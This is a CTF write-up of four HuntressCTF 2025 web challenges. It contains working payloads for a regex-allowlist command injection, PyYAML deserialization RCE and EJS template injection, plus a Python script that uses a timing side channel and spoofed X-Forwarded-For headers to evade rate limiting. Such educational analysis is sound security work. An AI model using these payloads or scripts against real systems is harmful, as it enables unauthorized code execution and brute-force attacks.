My CTF team, Kern(a)l, placed in the top 50 at HuntressCTF 2025. Shoutout to:



ARIKA

The Arika ransomware group likes to look slick and spiffy with their cool green-on-black terminal style website… but it sounds like they are worried about some security concerns of their own!

Before looking at the application, I like to review the source code to identify potential vulnerability paths. Looking at app.py, the application appears to be vulnerable to command injection.

```python
import os, re
import subprocess
from flask import Flask, render_template, request, jsonify

app = Flask(__name__)

ALLOWLIST = ["leaks", "news", "contact", "help",
             "whoami", "date", "hostname", "clear"]

def run(cmd):
    try:
        proc = subprocess.run(["/bin/sh", "-c", cmd], capture_output=True, text=True, check=False)
        return proc.stdout, proc.stderr, proc.returncode
    except Exception as e:
        return "", f"error: {e}\n", 1

@app.get("/")
def index():
    return render_template("index.html")

@app.post("/")
def exec_command():
    data = request.get_json(silent=True) or {}
    command = data.get("command") or ""
    command = command.strip()
    if not command:
        return jsonify(ok=True, stdout="", stderr="", code=0)
    if command == "clear":
        return jsonify(ok=True, stdout="", stderr="", code=0, clear=True)
    if not any([re.match(r"^%s$" % allowed, command, len(ALLOWLIST)) for allowed in ALLOWLIST]):
        return jsonify(ok=False, stdout="", stderr="error: Run 'help' to see valid commands.\n", code=2)
    stdout, stderr, code = run(command)
    return jsonify(ok=(code == 0), stdout=stdout, stderr=stderr, code=code)

if __name__ == "__main__":
    app.run(host="0.0.0.0", port=int(os.getenv("PORT", 5000)), debug=False)
```

The ALLOWLIST looks strict and seems to restrict the user to that set of commands… but does it really?

```python
ALLOWLIST = ["leaks", "news", "contact", "help", "whoami", "date", "hostname", "clear"]
```

When the user sends a POST request to the / endpoint, it runs the exec_command() function.

This code retrieves the command parameter and strips leading and trailing whitespace. Newlines in the middle of the string are left intact. It then uses a regex to check whether the command matches one of the ALLOWLIST entries. If the command passes the check, it is handed to the run() function, which executes it on the backend with /bin/sh -c and returns the output.

```python
def run(cmd):
    try:
        proc = subprocess.run(["/bin/sh", "-c", cmd], capture_output=True, text=True, check=False)
        return proc.stdout, proc.stderr, proc.returncode
    except Exception as e:
        return "", f"error: {e}\n", 1

@app.post("/")
def exec_command():
    data = request.get_json(silent=True) or {}
    command = data.get("command") or ""
    command = command.strip()
    if not command:
        return jsonify(ok=True, stdout="", stderr="", code=0)
    if command == "clear":
        return jsonify(ok=True, stdout="", stderr="", code=0, clear=True)
    if not any([re.match(r"^%s$" % allowed, command, len(ALLOWLIST)) for allowed in ALLOWLIST]):
        return jsonify(ok=False, stdout="", stderr="error: Run 'help' to see valid commands.\n", code=2)
    stdout, stderr, code = run(command)
    return jsonify(ok=(code == 0), stdout=stdout, stderr=stderr, code=code)
```

re.match is called with three arguments:

```python
re.match(r"^%s$" % allowed, command, len(ALLOWLIST))
```

- ^%s$ % allowed: the regex pattern to match against the string
- command: the string being matched against the pattern
- flags (optional): alters the behavior of the regex matching. Here, this argument receives len(ALLOWLIST).

Can you tell which argument is probably the vulnerable one? Yes, it's the flags argument! This article explains why and how this works.

re.MULTILINE has the integer value 8 (binary 1000). ALLOWLIST contains 8 entries, so len(ALLOWLIST) evaluates to 8 and every match is performed with re.MULTILINE. In multiline mode, ^ and $ match at the start and end of each line, not only at the start and end of the whole string. As a result, a pattern like ^whoami$ matches as long as the first line of the input is exactly whoami.

We can create a new line with the \n character. With all of this in mind, we can craft our payload. First, we need a command from the allowlist, such as whoami. Next, we add a \n to make the payload multi-line. After that, we can append any command we want. /bin/sh -c executes each line as a separate command, so this gives us Remote Code Execution (RCE). In this case, we want to read flag.txt.

```
whoami\ncat flag.txt
```
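To see the bypass in isolation, here is a minimal sketch that reproduces only the allowlist check from app.py, with no Flask and no shell. The allowed() helper is a hypothetical wrapper written for this demo and is not part of the challenge. The sketch confirms that len(ALLOWLIST) equals re.MULTILINE, and that the multi-line payload passes the check only because of that flag.

```python
import re

# Allowlist copied from the challenge's app.py
ALLOWLIST = ["leaks", "news", "contact", "help",
             "whoami", "date", "hostname", "clear"]

def allowed(command: str, flags: int) -> bool:
    # Hypothetical helper mirroring the check in exec_command()
    return any(re.match(r"^%s$" % a, command, flags) for a in ALLOWLIST)

payload = "whoami\ncat flag.txt"  # a real newline character, not backslash + n

print(len(ALLOWLIST) == re.MULTILINE)    # True: both are 8
print(allowed(payload, len(ALLOWLIST)))  # True: "$" matches just before the newline
print(allowed(payload, 0))               # False without MULTILINE
```

Without MULTILINE, $ only matches at the very end of the string or before a trailing newline, so the same payload would be rejected.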



However, when we input this payload into the application, we receive an error.



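Looking at Burp Suite, we can see the issue. The frontend escapes our input, so the request contains \\n (a literal backslash followed by n) instead of \n, which the JSON parser would decode into a real newline.

We send the request to Repeater, change the payload back to \n, and submit it. The response contains the flag.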
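The difference Burp revealed is easy to reproduce with Python's standard json module. The sketch below contrasts the two encodings. As an alternative to Repeater, it also sends the payload with a real newline using urllib. The send_command() helper is hypothetical, and the base URL you pass it is a placeholder for your own challenge instance.

```python
import json
import urllib.request

# What the web UI sent: a literal backslash followed by "n"
typed = json.dumps({"command": r"whoami\ncat flag.txt"})
# What we want: an actual newline character, which JSON encodes as \n
wanted = json.dumps({"command": "whoami\ncat flag.txt"})

print(typed)   # {"command": "whoami\\ncat flag.txt"}
print(wanted)  # {"command": "whoami\ncat flag.txt"}

def send_command(base_url: str, command: str) -> dict:
    """POST {"command": ...} as JSON to /, the same way the terminal UI does."""
    body = json.dumps({"command": command}).encode()
    req = urllib.request.Request(
        base_url + "/",
        data=body,
        headers={"Content-Type": "application/json"},  # get_json() ignores other types
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return json.loads(resp.read())

# Example (hypothetical address):
# print(send_command("http://TARGET:5000", "whoami\ncat flag.txt")["stdout"])
```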

Flag: flag{eaec346846596f7976da7e1adb1f326d}



Sigma Linter

Oh wow, another web app interface for command-line tools that already exist!

This one seems a little busted, though…

Looking at the application, it appears to be a YAML parser.



This is all the information we received about this challenge. The application appears to be just a YAML parser, so we can guess the vulnerability has something to do with YAML injection. However, we don't know what language the backend uses (Python, Java, etc.). First, I deleted all content from the Sigma Rule Editor and received an error message in the Validation Results pane.

The format of this error message suggests we are probably looking at a Python application. Searching Google for “Python YAML Injection” shows that this class of bug is actually a YAML deserialization attack. One of the first articles I read described this kind of vulnerability in PyYAML.



The Insecure Deserialization (Python) section of PayloadsAllTheThings lists a few payloads to choose from. The first one I tried was the following:

```yaml
!!python/object/new:subprocess.check_output [["ls","-ail"]]
```

Inserting it into the application gives us RCE: the command output shows up in the error message! The directory listing includes flag.txt, so we can retrieve the flag.



```yaml
!!python/object/new:subprocess.check_output [["cat","flag.txt"]]
```

Flag: flag{b692115306c8e5c54a2c8908371a4c72}

Beyond The Challenge

This challenge didn't provide source code, so I used the same technique to dump app.py and review what was going on.

```yaml
!!python/object/new:subprocess.check_output [["cat","app.py"]]
```

```python
from flask import Flask, render_template, request, jsonify
import yaml
import jsonschema
import os
import re

app = Flask(__name__)

def beautify_yaml(yaml_content):
    try:
        parsed = yaml.load(yaml_content, Loader=yaml.Loader)
        if isinstance(parsed, list) and len(parsed) > 0:
            parsed = parsed[0]
        if isinstance(parsed, dict):
            return yaml.dump(parsed, default_flow_style=False, sort_keys=False, indent=2)
        return yaml_content
    except:
        return yaml_content

def format_sigma_rule(rule_dict):
    if not isinstance(rule_dict, dict):
        return rule_dict
    formatted = {}
    if 'title' in rule_dict:
        formatted['title'] = rule_dict['title']
    if 'id' in rule_dict:
        formatted['id'] = rule_dict['id']
    if 'status' in rule_dict:
        formatted['status'] = rule_dict['status']
    if 'description' in rule_dict:
        formatted['description'] = rule_dict['description']
    if 'author' in rule_dict:
        formatted['author'] = rule_dict['author']
    if 'logsource' in rule_dict:
        formatted['logsource'] = rule_dict['logsource']
    if 'detection' in rule_dict:
        formatted['detection'] = rule_dict['detection']
    if 'level' in rule_dict:
        formatted['level'] = rule_dict['level']
    if 'fields' in rule_dict:
        formatted['fields'] = rule_dict['fields']
    if 'falsepositives' in rule_dict:
        formatted['falsepositives'] = rule_dict['falsepositives']
    if 'references' in rule_dict:
        formatted['references'] = rule_dict['references']
    return formatted

def sigma_lint(yaml_content, method='s2'):
    try:
        sigma_yaml = yaml.load(yaml_content, Loader=yaml.Loader)
        if isinstance(sigma_yaml, list):
            if len(sigma_yaml) > 1:
                return {
                    'result': False,
                    'reasons': ['Multi-document YAML files are not supported currently'],
                    'error_type': 'unsupported',
                    'formatted_code': beautify_yaml(yaml_content)
                }
            sigma_yaml = sigma_yaml[0]
        formatted_rule = format_sigma_rule(sigma_yaml)
        formatted_yaml = yaml.dump(formatted_rule, default_flow_style=False, sort_keys=False, indent=2)
        if method == 'jsonschema':
            schema = {
                "type": "object",
                "properties": {
                    "title": {"type": "string", "minLength": 1, "maxLength": 256},
                    "logsource": {
                        "type": "object",
                        "properties": {
                            "category": {"type": "string"},
                            "product": {"type": "string"},
                            "service": {"type": "string"},
                            "definition": {"type": "string"}
                        },
                        "anyOf": [
                            {"required": ["category"]},
                            {"required": ["product"]},
                            {"required": ["service"]}
                        ],
                        "additionalProperties": False
                    },
                    "detection": {
                        "type": "object",
                        "properties": {
                            "condition": {
                                "anyOf": [
                                    {"type": "string"},
                                    {"type": "array", "items": {"type": "string"}, "minItems": 2}
                                ]
                            },
                            "timeframe": {"type": "string"}
                        },
                        "additionalProperties": {
                            "anyOf": [
                                {"type": "array", "items": {"type": "string"}},
                                {"type": "object", "additionalProperties": {
                                    "anyOf": [
                                        {"type": "string"},
                                        {"type": "array", "items": {"type": "string"}, "minItems": 2}
                                    ]
                                }}
                            ]
                        },
                        "required": ["condition"]
                    },
                    "status": {"type": "string", "enum": ["stable", "testing", "experimental"]},
                    "description": {"type": "string"},
                    "references": {"type": "array", "items": {"type": "string"}},
                    "fields": {"type": "array", "items": {"type": "string"}},
                    "falsepositives": {
                        "anyOf": [
                            {"type": "string"},
                            {"type": "array", "items": {"type": "string"}, "minItems": 2}
                        ]
                    },
                    "level": {"type": "string", "enum": ["low", "medium", "high", "critical"]}
                },
                "required": ["title", "logsource", "detection"]
            }
        else:
            schema = {
                "type": "object",
                "properties": {
                    "title": {"type": "string", "minLength": 1, "maxLength": 256},
                    "logsource": {
                        "type": "object",
                        "properties": {
                            "category": {"type": "string"},
                            "product": {"type": "string"},
                            "service": {"type": "string"},
                            "definition": {"type": "string"}
                        },
                        "anyOf": [
                            {"required": ["category"]},
                            {"required": ["product"]},
                            {"required": ["service"]}
                        ],
                        "additionalProperties": False
                    },
                    "detection": {
                        "type": "object",
                        "properties": {
                            "condition": {
                                "anyOf": [
                                    {"type": "string"},
                                    {"type": "array", "items": {"type": "string"}, "minItems": 2}
                                ]
                            },
                            "timeframe": {"type": "string"}
                        },
                        "additionalProperties": {
                            "anyOf": [
                                {"type": "array", "items": {
                                    "anyOf": [
                                        {"type": "string"},
                                        {"type": "object", "additionalProperties": {
                                            "anyOf": [
                                                {"type": ["string", "number"]},
                                                {"type": "array", "items": {"type": ["string", "number"]}}
                                            ]
                                        }}
                                    ]
                                }},
                                {"type": "object", "additionalProperties": {
                                    "anyOf": [
                                        {"type": ["string", "number", "null"]},
                                        {"type": "array", "items": {"type": ["string", "number"]}, "minItems": 1}
                                    ]
                                }}
                            ]
                        },
                        "required": ["condition"]
                    },
                    "status": {"type": "string", "enum": ["stable", "testing", "experimental"]},
                    "description": {"type": "string"},
                    "references": {"type": "array", "items": {"type": "string"}},
                    "fields": {"type": "array", "items": {"type": "string"}},
                    "falsepositives": {
                        "anyOf": [
                            {"type": "string"},
                            {"type": "array", "items": {"type": "string"}, "minItems": 1}
                        ]
                    },
                    "level": {"type": "string", "enum": ["low", "medium", "high", "critical"]}
                },
                "required": ["title", "logsource", "detection"]
            }
        validator = jsonschema.Draft7Validator(schema)
        errors = []
        for error in sorted(validator.iter_errors(sigma_yaml), key=str):
            errors.append(error.message)
        result = len(errors) == 0
        return {
            'result': result,
            'reasons': errors if errors else ['valid'],
            'error_type': 'validation' if not result else 'none',
            'formatted_code': formatted_yaml
        }
    except yaml.YAMLError as e:
        return {
            'result': False,
            'reasons': [f'YAML parsing error: {str(e)}'],
            'error_type': 'yaml_error',
            'formatted_code': beautify_yaml(yaml_content)
        }
    except Exception as e:
        return {
            'result': False,
            'reasons': [f'Unexpected error: {str(e)}'],
            'error_type': 'unexpected',
            'formatted_code': beautify_yaml(yaml_content)
        }

@app.route('/')
def index():
    return render_template('index.html')

@app.route('/lint', methods=['POST'])
def lint():
    data = request.get_json()
    yaml_content = data.get('yaml_content', '')
    method = data.get('method', 's2')
    result = sigma_lint(yaml_content, method)
    return jsonify(result)

@app.route('/examples')
def examples():
    examples_data = [
        {
            'name': 'process_creation_cmd.yml',
            'content': '''title: Basic Process Creation
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image: '*\\cmd.exe'
    condition: selection
level: medium'''
        },
        {
            'name': 'powershell_execution.yml',
            'content': '''title: PowerShell Execution
log source:
    category: process_creation
    product: windows
detection:
    selection:
        Image: '*\\powershell.exe'
        CommandLine:
            - '* -enc *'
            - '* -e *'
    condition: selection
level: high'''
        },
        {
            'name': 'network_connection.yml',
            'content': '''title: Suspicious Network Activity
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        DestinationPort:
            4444
            8080
        ProcessName: '*\\nc.exe'
    condition: selection
level: medium'''
        },
        {
            'name': 'registry_modification.yml',
            'content': '''title: Registry Modification
logsource:
    category: registry_event
    product: windows
detection:
    selection
        TargetObject: '*\\Run\\*'
        Details: '*'
    condition: selection
level: medium'''
        }
    ]
    return jsonify(examples_data)

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=5000, debug=False)
```

The vulnerability lies in the yaml.load(yaml_content, Loader=yaml.Loader) call. With yaml.Loader, PyYAML doesn't just parse YAML. It can also construct arbitrary Python objects from YAML tags.

The official PyYAML documentation describes Python-specific tags such as !!python/object/new. Our payload uses this tag to reference check_output from the subprocess module. PyYAML calls it with the list we supplied, which executes the command on the backend. The returned bytes are then validated against the schema. They are not a JSON object, so jsonschema reports an "… is not of type 'object'" error that echoes the command output back to us.
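To see why the Loader choice matters, here is a minimal sketch, assuming PyYAML is installed. It passes a harmless stand-in payload both to the challenge's yaml.load(..., Loader=yaml.Loader) call and to yaml.safe_load(). The stand-in calls builtins.len instead of subprocess.check_output. The unsafe_parse() and safe_parse() names are hypothetical helpers written for this demo.

```python
import yaml  # PyYAML (third-party: pip install pyyaml)

# Harmless stand-in for the challenge payload: "call builtins.len([1, 2, 3])"
PAYLOAD = "!!python/object/new:builtins.len [[1, 2, 3]]"

def unsafe_parse(text):
    # Same call that sigma_lint() and beautify_yaml() make in the challenge
    return yaml.load(text, Loader=yaml.Loader)

def safe_parse(text):
    # SafeLoader only builds plain YAML types; python/* tags raise an error
    try:
        return yaml.safe_load(text)
    except yaml.YAMLError as exc:
        return f"rejected: {type(exc).__name__}"

print(unsafe_parse(PAYLOAD))  # 3: the function was actually called
print(safe_parse(PAYLOAD))    # rejected: ConstructorError
```

Sigma rules only need plain mappings, lists, and scalars, so switching both calls to yaml.safe_load() would be a straightforward fix for this app.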

Emotional

Don’t be shy, show your emotions! Get emotional if you have to! Uncover the flag.

Looking at the code, we can see that there are two endpoints:

- /setEmoji (POST)
- / (GET)

```javascript
const fs = require('fs');
const ejs = require('ejs');
const path = require('path');
const express = require('express');
const bodyParser = require('body-parser');

const app = express();

app.set('view engine', 'ejs');
app.set('views', path.join(__dirname, 'views'));
app.use(express.static(path.join(__dirname, 'public')));
app.use(bodyParser.json());
app.use(bodyParser.urlencoded({ extended: true }));

let profile = {
    emoji: "😊"
};

app.post('/setEmoji', (req, res) => {
    const { emoji } = req.body;
    profile.emoji = emoji;
    res.json({ profileEmoji: emoji });
});

app.get('/', (req, res) => {
    fs.readFile(path.join(__dirname, 'views', 'index.ejs'), 'utf8', (err, data) => {
        if (err) {
            return res.status(500).send('Internal Server Error');
        }
        const profilePage = data.replace(/<% profileEmoji %>/g, profile.emoji);
        const renderedHtml = ejs.render(profilePage, { profileEmoji: profile.emoji });
        res.send(renderedHtml);
    });
});

const PORT = 3000;
app.listen(PORT, () => {
    console.log(`Server is running on port ${PORT}`);
});
```

```html
<div class="container">
    <div class="main-card">
        <div class="profile-section">
            <h2><b>Get Emotional!</b></h2>
            <div class="current-emoji">
                <span id="currentEmoji"><% profileEmoji %></span>
            </div>
            <button id="submitEmoji" class="btn submit-btn mt-3">Update Emotion</button>
        </div>
        <div class="emoji-section">
            <div class="emoji-grid" id="emojiGrid">
            </div>
        </div>
    </div>
</div>
```

When a user sends a POST request to the /setEmoji endpoint, their input is stored in profile.emoji. The / endpoint then reads views/index.ejs as plain text and replaces the <% profileEmoji %> placeholder with profile.emoji using a string replacement. Only afterwards does it pass the result to ejs.render(). The profile.emoji value is never sanitized. Because it becomes part of the template source itself, any EJS tags it contains are executed during rendering.

EJS uses <% %> tags to execute JavaScript (and <%= %> to output the result), and this can be abused here. Searching for EJS SSTI payloads turns up a commonly used one:

```
<%=process.mainModule.require("child_process").execSync("ls").toString()%>
```

Knowing this information, we can attempt to exploit this vulnerability. Looking at the application, we see a bunch of emojis present.



Using Burp Suite to intercept the traffic, we can click Update Emotion and observe the request.



After inserting our payload from before, we can see it is successfully stored on the server. When the webpage is re-rendered, the command output appears where the emoji used to be.





It looks like a flag.txt file is located in the same directory as the application. By changing the command to cat flag.txt, we can retrieve the flag.

```
<%=process.mainModule.require("child_process").execSync("cat+flag.txt").toString()%>
```

Flag: flag{8c8e0e59d1292298b64c625b401e8cfa}
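The two Burp requests for this challenge can also be scripted. Here is a minimal standard-library sketch. It stores the payload through /setEmoji, then fetches / so the server renders the poisoned template. It sends a form-encoded body, which the app accepts through bodyParser.urlencoded. urlencode() turns spaces into + and percent-escapes the special characters, and body-parser decodes them back. The function names and the base URL are hypothetical.

```python
import urllib.parse
import urllib.request

# EJS payload from this section, with a plain space in the command
PAYLOAD = '<%=process.mainModule.require("child_process").execSync("cat flag.txt").toString()%>'

def build_body(emoji: str) -> bytes:
    # application/x-www-form-urlencoded body: spaces become "+", specials are %-escaped
    return urllib.parse.urlencode({"emoji": emoji}).encode()

def exploit(base_url: str) -> str:
    # 1) Store the payload as the profile emoji (urllib sends form encoding by default)
    req = urllib.request.Request(base_url + "/setEmoji", data=build_body(PAYLOAD), method="POST")
    with urllib.request.urlopen(req, timeout=10):
        pass
    # 2) Render the page: the payload is spliced into index.ejs before ejs.render() runs
    with urllib.request.urlopen(base_url + "/", timeout=10) as resp:
        return resp.read().decode()

# Example (hypothetical address):
# print(exploit("http://TARGET:3000"))
```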

Flag Checker

We’ve decided to make this challenge really straightforward. All you have to do is find out the flag!

Juuuust make sure not to trip any of the security controls implemented to stop brute force attacks…

NOTE: Working this challenge may be difficult with the browser-based connection alone. We again recommend you use the direct IP address over the VPN connection.





This application doesn’t provide source code, so we are dealing with a black-box challenge. Looking at the application, we can see that it wants us to “guess” the flag, and it will validate it on the backend.

Using Burp Suite, we can capture the request when the Verify button is clicked. The placeholder in the input field says flag{}, so it's safe to assume the flag starts with the five characters flag{ and we can use those as our starting point.





The first thing I found interesting was the X-Response-Time header in the response. This isn't a standard header, so it is most likely a custom implementation.

The first thing that came to mind was time-based enumeration. If the server checks the guess one character at a time, each additional correct character changes the response time in a measurable way. For instance, with flag{, the application takes about 0.5 seconds to respond. With just flag, it takes about 0.4 seconds.
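Here is a minimal, fully simulated sketch of the idea. It assumes, without confirmation from the challenge, that the server compares the guess one character at a time, stops at the first mismatch, and adds a fixed delay for each matching character. simulated_check(), the secret, and the 100 ms delay are all hypothetical. Under that model, the correct next character is the only candidate that makes the response slower than the current prefix.

```python
# Hypothetical secret and per-character delay; the real values are unknown.
SECRET = "flag{0123abcd}"
DELAY_MS = 100

def simulated_check(guess: str) -> int:
    """Model of an early-exit comparison: time grows with the matching prefix."""
    elapsed = 0
    for g, s in zip(guess, SECRET):
        if g != s:
            break  # stop at the first mismatching character
        elapsed += DELAY_MS
    return elapsed

def recover(prefix: str, alphabet: str, length: int) -> str:
    """Extend the known prefix one character at a time using only response times."""
    known = prefix
    for _ in range(length):
        baseline = simulated_check(known)
        for c in alphabet:
            if simulated_check(known + c) > baseline:
                known += c
                break
        else:
            raise RuntimeError("no candidate made the response slower")
    return known

print(simulated_check("flag"), simulated_check("flag{"))  # 400 500
print(recover("flag{", "abcdef0123456789", 8))            # flag{0123abcd
```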



In this CTF, the flags have been MD5 hashes: 32 characters drawn from only 16 possible values (a-f, 0-9). Guessing one position at a time therefore takes at most 16 × 32 = 512 requests, which makes brute-forcing the characters feasible. However, after a few attempts, you get rate-limited and your IP is blocked.

When attempting this challenge, I tried every rate-limiting bypass I could think of. I even installed an IP rotator to see if that would solve it, but it didn't work. Additionally, as you can see, we can't brute-force the flag while rate-limited, because X-Response-Time drops back to 0.0.



When this challenge first came out, I found an unintended solution: restarting the machine several times and guessing each character of the flag until I got it. This was very inefficient, but it worked. I knew there was another way to do it; I just didn't know how… until something clicked! What if this is the wrong web application, and there's another one on the system that I should be looking at? I began guessing common web application ports such as 3000, 5000, 8000, 8080, and 8443.

Browsing to port 5000, we find what looks like the same application.

However, when we click the Verify button on this application, we get a different error message.

The X-Forwarded-For header is a common rate-limiting bypass, because some applications trust it to identify the client's IP. The original application was blocking our IP, so we can set a different IP in the X-Forwarded-For header on every request. This bypasses the rate-limiting protection on the port 5000 application.
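Why would a spoofed header help? A plausible explanation is that the rate limiter identifies clients by X-Forwarded-For whenever that header is present. This is an assumption, since the source for the port 5000 application isn't available. The toy model below uses a hypothetical NaiveRateLimiter class with a limit of 5. It shows how rotating that header gives every request a fresh counter.

```python
from collections import Counter

class NaiveRateLimiter:
    """Hypothetical limiter that trusts X-Forwarded-For as the client identity."""

    def __init__(self, limit: int = 5):
        self.limit = limit
        self.hits = Counter()

    def allow(self, remote_addr: str, headers: dict) -> bool:
        # Attacker-controlled header wins over the real socket address
        key = headers.get("X-Forwarded-For", remote_addr)
        self.hits[key] += 1
        return self.hits[key] <= self.limit

limiter = NaiveRateLimiter()
same = [limiter.allow("10.0.0.5", {}) for _ in range(10)]
rotated = [limiter.allow("10.0.0.5", {"X-Forwarded-For": f"2.2.0.{i}"}) for i in range(10)]
print(same.count(True), rotated.count(True))  # 5 10
```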



With a custom script, we can extract the flag by checking whether the response time changes for each candidate character. The script varies the X-Forwarded-For IP address between requests so we don't get rate-limited. If the response time for the current guess is longer than for the last confirmed prefix, the character is correct. The script continues until it has recovered all 32 characters of the flag.

```python
import requests
import math

ip = input("IP Address: ")

def get_initial_time():
    # Baseline: response time for the known prefix "flag{"
    params = {
        'flag': 'flag{'
    }
    headers = {
        'X-Forwarded-For': '1.1.1.1'
    }
    r = requests.get(f"http://{ip}:5000/submit", params=params, headers=headers)
    return r.headers.get('X-Response-Time')

def exploit():
    flag = ''
    chars = 'abcdef1234567890'  # flags are lowercase hex
    last_char_found_time = get_initial_time()
    while len(flag) != 32:
        for number, char in enumerate(chars):
            params = {
                'flag': 'flag{' + f'{flag}{char}'
            }
            # Vary the spoofed client IP between requests to dodge the rate limiter
            headers = {
                'X-Forwarded-For': f'2.2.{number + len(flag)}.{number}'
            }
            r = requests.get(f"http://{ip}:5000/submit", params=params, headers=headers)
            current_char_time = r.headers.get('X-Response-Time')
            # Compare times floored to 0.1 s; a slower response means the character is correct
            if math.floor(float(last_char_found_time) * 10) / 10 < math.floor(float(current_char_time) * 10) / 10:
                flag += char
                print("Found next char: flag{" + flag + '}')
                last_char_found_time = current_char_time
                break
    if len(flag) == 32:
        print("FLAG FOUND: flag{" + flag + "}")

if __name__ == '__main__':
    exploit()
```

Flag: flag{77ba0346d9565e77344b9fe40ecf1369}

Authors

Lead Technical Writer

Evan is a dedicated cybersecurity professional with a degree from Roger Williams University. He is certified in GRTP, OSCP, eWPTX, eCPPT, and eJPT. He specializes in web application and API security. In his free time, he identifies vulnerabilities in FOSS applications and mentors aspiring cybersecurity professionals.
